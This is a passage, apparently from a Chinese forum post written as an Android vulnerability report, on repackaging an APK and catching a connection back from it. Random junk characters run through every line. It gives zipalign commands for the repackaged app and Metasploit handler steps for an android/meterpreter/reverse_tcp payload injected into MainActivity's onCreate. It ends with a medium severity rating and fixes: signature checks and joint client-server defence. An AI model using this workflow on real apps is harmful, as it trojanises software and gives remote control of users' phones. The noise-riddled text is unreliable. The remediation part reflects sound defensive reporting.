1 ~) R4 v9 a, ?3 e6 c; Z ) a; E% B: C7 z* ~6 q zipalign -v 4 repackaged.apk final.apk : `# N* k' V0 z! A& n* y 1 a$ @% b% j4 R& {* i

2 e$ Z# b* i( m- \6 q * o+ ]# z% N+ r$ D6 j 检查是否对齐 0 ?! S) e" f7 d7 n% M, z; h + L- Q2 b( ]7 j% n% x: S

. z0 K6 o+ Q2 c8 h" P- K( Y" P ! Y7 A) z J8 b: A, y6 N' M* q+ X zipalign -c -v 4 final.apk ; L; r: D2 v( ~3 |- F1 C, d+ Z. d, c. X% a3 I" S' ]

4 y8 R/ ]& g P. ]3 ^% M + s3 l% X& h. o2 L9 U 注：zipalign可以在V1签名后执行，但zipalign不能在V2签名后执行,只能在V2签名之前执行 * g# [1 l% f$ j* L- H% c 8 R: J4 c" h+ D' O @. d

r: M e0 b; D2 {" l. X2 L8 o p 8 d5 `& ^3 O) q7 T 启动Metasploit控制台，配置参数等待上线 5 ]3 n2 M% p+ m+ F% g . X1 P' F- c7 e6 @7 v3 C% t! O, ]

% u1 t5 P5 a9 [* N # g* F% w3 j/ q$ P" j% m 在终端依次输入如下命令 N& `! O/ P( H+ W2 Z& U" a; ^5 ^8 H; G9 w3 P

2 O4 U' Z; i+ ]. I" G( Z2 b& w- W9 }. B; X msfconsole 3 P% l: N, G2 ^9 H1 U" i O5 i! M ; u- i3 h( o, A# H

, l. [" j7 z- S8 B4 N2 R $ ]3 I! f( i! I- C/ y use exploit/multi/handler 3 q4 v. k! {/ I7 h4 D % P( x2 z1 {& L6 U- I' V+ `

/ G: t7 ]4 S' t0 u 2 ?. E3 G) ^' e' T; o set PAYLOAD android/meterpreter/reverse_tcp ! r/ K% y0 b, C8 d/ `) K, p5 k/ m : q( w6 H3 e# P; W# u' Q

0 h4 r. _; X1 L% _8 w, l1 s2 d ) M4 C4 u- v9 f# h set LHOST 192.xxx.xx.xx 8 Q& T( `2 g, g# h2 S & y) H2 s0 |- G- p

* e. d! S$ H- _; s3 } # q$ N; i! |4 C2 f: R1 y! Q. D set LPORT 4444 5 ` J, K8 w/ X6 ^# h! e. [7 H ' E& m) i" R3 W9 }$ \

5 g+ [3 l4 g' K7 c g * h+ E; q8 v+ I exploit 9 Y1 _9 \9 `8 w4 c _4 `* v! f 4 |4 H4 @$ d1 u" [& t% m: w

0 ?* B& O) L, X0 J, {. N& H ) P: N7 R% F2 b3 h: h1 f 之前我们把入口放在 MainActivity 的 onCreate 方法中，当启动目标应用进入该界面，就会连接成功，如下图： ( u+ \2 h. e' |$ K n " V! \, U+ c G& M

/ ?, V2 [' x: i4 T, j/ P6 @* A1 x7 m) G. k 漏洞危害：中 - ?8 S: a8 j+ X- @6 b8 E/ } _1 c( n# G2 _5 E, J# k

) \|1 P, o; O, A4 T& Y 5 r: w* R8 x& f) c+ \|( X* ?+ m# K8 \6 } . Q# L: a/ H1 @$ C H$ v; @' c2 s8 b 严重程度 ( }7 V5 u0 b' L4 V 5 g' E. L+ X* Z4 n% t- r$ N 7 r7 }/ o. @. ^# V3 Q * o4 @/ p& v4 x g- b: a$ X# Y	) ?# _; \|) s0 x9 T# V9 j4 n 0 i! K7 ]0 @( t6 H5 n $ K$ {$ L% b0 \|/ w& @ & _& G8 E$ r5 m4 o, q3 M 高 : r% S/ n& \|9 H Y% K& s/ u! j' [: h" R+ ?2 y ( Q' c2 p- L$ @3 ~- A: j9 u : D: q- b" P" n( B4 u	: A. ~5 V3 n) q& U# u - J# f, y- W& s. L 6 ^$ v6 _% j; j7 b* _$ v ( f9 n- h" Q+ p ■ / T7 c7 z' e+ S & D% U7 I+ b3 r$ s! y3 N7 Z) U " _- e' r2 n$ X+ W% L : U G. k8 X7 f! z; R	7 r6 W2 Z8 s' Y' l; o5 a$ \) h 7 S6 x" u# p1 \) v( `3 a . {, _. g3 X* T6 Q + ~$ h2 i7 }+ Y5 _ 中 ' y, @$ ^; U5 Q9 ]6 I9 ~6 R- X6 ` ! o) ~; u2 C w& Q) Q ; I, A. w4 b6 P% u# a - B7 H. j7 k5 Y) K! l3 D	" y4 P; H. D" p# X9 x % }5 k* A5 \|2 e7 \|" ` r0 D ) F5 {" Y- d0 b% C" ~1 d2 h% A% ` . f# G3 ]% j" \|; u- { 9 T. Q" K% u, w3 g% Y+ A9 z " D D- Z" a# S# t* E& \|1 t7 C 1 Z( P5 c* r/ A ( ~% M& ~) V: E' O 6 J7 ?" Q* Z* H2 a	: X) z7 a- k$ N0 L. i H, E- S% ` : Y( Z: d5 L4 J! ^ 7 u, h: h2 X5 k& `( b) z$ V ' q5 q3 \|' X, T; ~8 s 低 ( J9 H9 I" f* V3 l ' K$ B4 k4 Y- E( H& F % @' V) h. }; U% a- V 0 [3 G: w& I! ^; S	6 i& C5 C# T7 M: L; ^) L 8 E: z* R( a* L+ X' J: ]4 U; r* @ ) t9 a3 `/ Y- c- Y3 r$ p9 B 9 C2 u1 I i" T' v * k+ I& u9 K0 J) P ! i& a1 [* X. a$ M2 y( ^ " S% ? a" g. [* b) C$ Y- y ! a, I, `1 r. V 7 k# E$ o) `- ~# y3 U, Z j+ ] ' I2 c' X/ e/ t0 h* k# L0 i# `

$ }6 w, P. h* M& |# }* ]7 T Z1 O% V R) D! [' I) U ' A0 S2 m; c, r! d: R * H* [- x5 ]6 Z$ M) F4 i

4 P$ ]1 c$ t$ ?; R e4 ? 3 S3 g; v7 A, z1 t# t: ] 修复方法： ' Z q3 e1 E% U6 y2 g$ B; m / P$ K& B5 l0 f% S9 T: r

2 `0 m0 m1 o) e' t) B/ M * W* T1 S$ ^5 j1 c 1.在 APP 启动时应做签名校验防止二次打包。
% A# e! V7 n" @2 j/ _/ _. Q3 r& y2 i2 M 2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。 , h' A0 A6 C4 g; [$ t ) L' L6 L- I6 ~2 S x" T& [

- K/ I0 I* _5 G( Q3 G1 I( K: a D* g$ |- B! k. T, ?, N , ^5 V. c, }( t ! K) _$ d4 X2 `: l( @; i7 M. G

: Q' z) [! v! u& w * A% X9 N) q3 J7 X& P
8 f! P. _& T3 c1 X0 p$ C# W; r. Y

		自动登录	找回密码
密码			立即注册